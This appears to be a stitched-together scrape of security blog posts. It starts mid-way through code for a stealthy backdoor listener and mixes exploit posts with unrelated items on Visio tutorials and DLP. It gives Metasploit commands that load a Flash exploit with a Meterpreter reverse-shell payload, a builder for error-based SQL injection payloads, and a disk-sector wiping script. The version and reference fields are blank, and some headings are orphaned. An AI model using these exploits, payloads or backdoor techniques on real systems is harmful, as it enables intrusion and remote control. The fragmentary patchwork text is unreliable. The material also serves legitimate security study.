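    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.bind(("127.0.0.1", port))
    try:
        while True:
            data, addr = s.recvfrom(2048)
            if data == MAGIC:
                return addr
    finally:
        s.close()
```

Because the real server uses a sniffer instead of a listening socket, no open port shows up in `netstat`, which is what makes this style of backdoor "invisible".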

CVE-2011-2140 Adobe Flash Player MP4 Metasploit Demo

Eric posted the PoC video for the Adobe exploit on his blog.

Timeline :

Vulnerability reported to ZDI by Anonymous

Vulnerability reported to the vendor by ZDI on 2011-02-10

Coordinated public release of the vulnerability on 2011-08-23

Vulnerability reported exploited in the wild in November 2011

First PoC provided by Abysssec on 2012-01-31

Metasploit PoC provided on 2012-02-10

PoC provided by :

Alexander Gavrun



Reference(s) :





Affected version(s) :

Adobe Flash Player and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player

Longtail SWF Player

Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing an MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
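The bug class here is the familiar unchecked-count copy: a length field read from the file drives a copy into a fixed-size buffer. A hypothetical sketch (field names borrowed from the H.264 SPS fields mentioned above, not Adobe's actual code) of the bounds check the vulnerable code was missing:

```python
MAX_REF_FRAMES = 256  # illustrative fixed-size buffer length

def copy_ref_frame_offsets(offsets):
    """Hypothetical sketch of the bug class, not Adobe's code. The SPS
    field num_ref_frames_in_pic_order_cnt_cycle supplies an attacker-
    controlled count, and the vulnerable code copied that many
    offset_for_ref_frame values into a fixed-size stack buffer.
    The bounds check below is the kind of check that was missing."""
    num_ref_frames_in_pic_order_cnt_cycle = len(offsets)
    if num_ref_frames_in_pic_order_cnt_cycle > MAX_REF_FRAMES:
        return None  # reject: would overflow the fixed buffer
    buf = [0] * MAX_REF_FRAMES
    buf[:num_ref_frames_in_pic_order_cnt_cycle] = offsets  # the copy
    return num_ref_frames_in_pic_order_cnt_cycle
```

In C, where the original flaw lived, the oversized copy overwrites adjacent stack memory (including the return address), which is what turns a parsing bug into code execution.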

Commands :

use exploit/windows/browser/adobe_flash_sps
set PAYLOAD windows/meterpreter/reverse_tcp


Free Visio 2010 Video Tutorials from Microsoft


Microsoft recently began releasing a series of free video tutorials for Microsoft Visio 2010. The videos are hosted by three notable Visio experts (or "MVPs" as Microsoft calls them): Scott Helmers, David Parker, and Chris Roth. Chris is also the author of Using Microsoft Visio 2010, an excellent introduction to the new features of Visio 2010 (and Visio in general).

Currently, only the first five of the 24 tutorials have been released. Unfortunately, Microsoft has stuck to a glacial release schedule of one tutorial per week; the last of the series is set to be published in mid-June. The videos average around six or seven minutes apiece and are available for direct download. Given their length one would think embedded Flash video would be a preferable medium, but at least this way they can easily be archived for later reference.


Friday, February 10, 2012

Quickpost: Disassociating the Key From a TrueCrypt System Disk

Didier Stevens has a nice post on his blog about disassociating the key from a TrueCrypt system disk.

TrueCrypt allows for full disk encryption of a system disk. I use it on my Windows machines. You probably know that the TrueCrypt password you type is not the key. But it is, simply put, used to decrypt the master key that is in the volume header. On a system drive, the volume header is stored in the last sector of the first track of the encrypted system drive (TrueCrypt 7.0 or later). Usually, a track is 63 sectors long and a sector is 512 bytes long. So the volume header is in sector 62. When this header is corrupted or modified, you can no longer decrypt the disk, even with the correct password. You need to use the TrueCrypt Rescue Disk to restore the volume header. This rescue disk was created when you encrypted the disk. I’m using Tiny Hexer on the Universal Boot CD For Windows to erase the volume header (you can’t modify the volume header easily when you booted from the TrueCrypt system disk; using a live CD like UBCD4WIN is one possible workaround).
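The sector arithmetic above is easy to check. Assuming the usual geometry (63 sectors per track, 512 bytes per sector):

```python
SECTOR_SIZE = 512        # bytes per sector
SECTORS_PER_TRACK = 63   # the "S" in the CHS geometry reported by MBRWizard

# TrueCrypt (7.0 or later) keeps the system volume header in the last
# sector of the first track: sector index 62, counting from 0.
header_sector = SECTORS_PER_TRACK - 1
header_offset = header_sector * SECTOR_SIZE

print(header_sector, hex(header_offset))  # 62 0x7c00
```

So the byte offset a hex editor needs is 0x7C00 (31744) from the start of the drive.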

First I’m checking the geometry of the system drive with MBRWizard:

Take a look at the CHS (Cylinders Heads Sectors) value: S = 63 confirms that a track is 63 sectors long.

Then I open the system drive with Tiny Hexer (notice that the sector size is 512 bytes or 0x200 bytes):

I go to sector 62, the last sector of the first track:

It contains the volume header (an encrypted volume header has no recognizable patterns; it looks like random bytes):

Then I erase the volume header by filling the sector with zeroes and writing it back to disk:

And if you absolutely want to prevent recovery of this erased sector, write several times to it with random data.
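The same erase can be scripted against a raw image. A sketch (DESTRUCTIVE if pointed at a real device; shown here against an image file, and as noted below, make that full backup first):

```python
import os

def wipe_sector(path, sector, sector_size=512, random_passes=0):
    """Overwrite one sector of a raw image (or device) with zeroes,
    optionally preceded by passes of random data to hinder recovery.
    DESTRUCTIVE - take a full backup before running this for real."""
    with open(path, "r+b") as f:
        for _ in range(random_passes):
            f.seek(sector * sector_size)
            f.write(os.urandom(sector_size))
            f.flush()
        f.seek(sector * sector_size)
        f.write(b"\x00" * sector_size)

# e.g. wipe_sector("disk.img", 62, random_passes=3) to kill the
# TrueCrypt system volume header in sector 62.
```

Note that, as described above, you can't do this to the disk you booted from; run it from a live environment against the offline disk or an image of it.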

Booting is no longer possible, even with the correct password. The TrueCrypt bootloader will tell you the password is incorrect:

One can say that I’ve created a TrueCrypt disk that requires 2-factor authentication. To decrypt this disk, you need 2 factors: the password and the corresponding TrueCrypt Rescue Disk.

First you need to boot from the TrueCrypt Rescue Disk, and select Repair Options (F8):

And then you write the volume header back to the system disk. Remark that the TrueCrypt Rescue Disk requires you to enter the password before it writes the volume header to the disk:

And now you can boot from the system disk with your password.

Use this method if you need to travel with or mail an encrypted system disk and want to be 100% sure there is no way to decrypt the drive while in transit. But don't travel with the 2 factors on you; send the TrueCrypt Rescue Disk via another channel.

Remark: MBRWizard allows you to wipe sectors, but for whatever reason, it couldn’t successfully wipe sector 62 on my test machine.

Oh yeah, don’t forget to make a full backup before you attempt this technique ;-)

Video: DarkMarket

Author Misha Glenny was interviewed by broadcast journalist Charlie Rose recently. The majority of the discussion was based on Misha's current book, DarkMarket: Cyberthieves, Cybercops and You.

The interview is 20 minutes long and provides an excellent summary of the threats currently facing the Internet.

Misha Glenny, DarkMarket

On 08/02/12 At 01:50 PM

FatCat Auto SQL Injector

FatCat is an automatic SQL injection tool for testing your web applications and exploiting them more deeply. Its features help you extract database, table, and column information from a web application, but only if it is vulnerable to SQL injection.

FatCat's user-friendly GUI automatically detects the SQL injection vulnerability and starts exploiting it.


It currently supports two injection techniques:

1) Normal SQL Injection

2) Double Query SQL Injection
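For reference, a "double query" (error-based) MySQL injection typically abuses a duplicate-key error to leak data through the error message. A sketch of how such a payload is commonly built, for testing your own applications (FatCat's exact payloads may differ):

```python
def double_query_payload(subquery="version()"):
    """Build the classic MySQL error-based ("double query") injection
    payload: grouping on a concat() of the subquery's result and
    floor(rand(0)*2) provokes a duplicate-key error whose message
    contains the subquery's result. Illustrative only."""
    return ("(select 1 from (select count(*),concat((select ({})),"
            "0x3a,floor(rand(0)*2))x from information_schema.tables "
            "group by x)a)").format(subquery)
```

Swap in subqueries like `database()` or a `select ... from information_schema.columns` to enumerate schema, which is essentially what the tool automates.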

Look forward to the following features in the next version:

1) WAF bypass

2) Cookie Header passing

3) Load File

4) Generating XSS from SQL


Requirements:

1) PHP Version 5.3.0

2) Enable file_get_function


Video Demo:

IronWASP Securitybyte Edition Released

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool's features are simple enough to be used by absolute beginners.

IronWASP makes use of the following excellent Free/Open Source libraries:

Monday, February 6, 2012

Implementing DLP: Integration Priorities and Components


Although it might be obvious by now, the following charts show which DLP components you need to integrate with which existing infrastructure, based on your priorities. I’ve broken this out into three different images to make them more readable. Why images? Because I have to dump all this into a whitepaper later, and building them in a spreadsheet and taking screenshots is a lot easier than mucking with HTML-formatted charts.

Between this and our priorities post and chart you should have an excellent idea of where to start and how to organize your DLP deployment.

- Rich
(0) Comments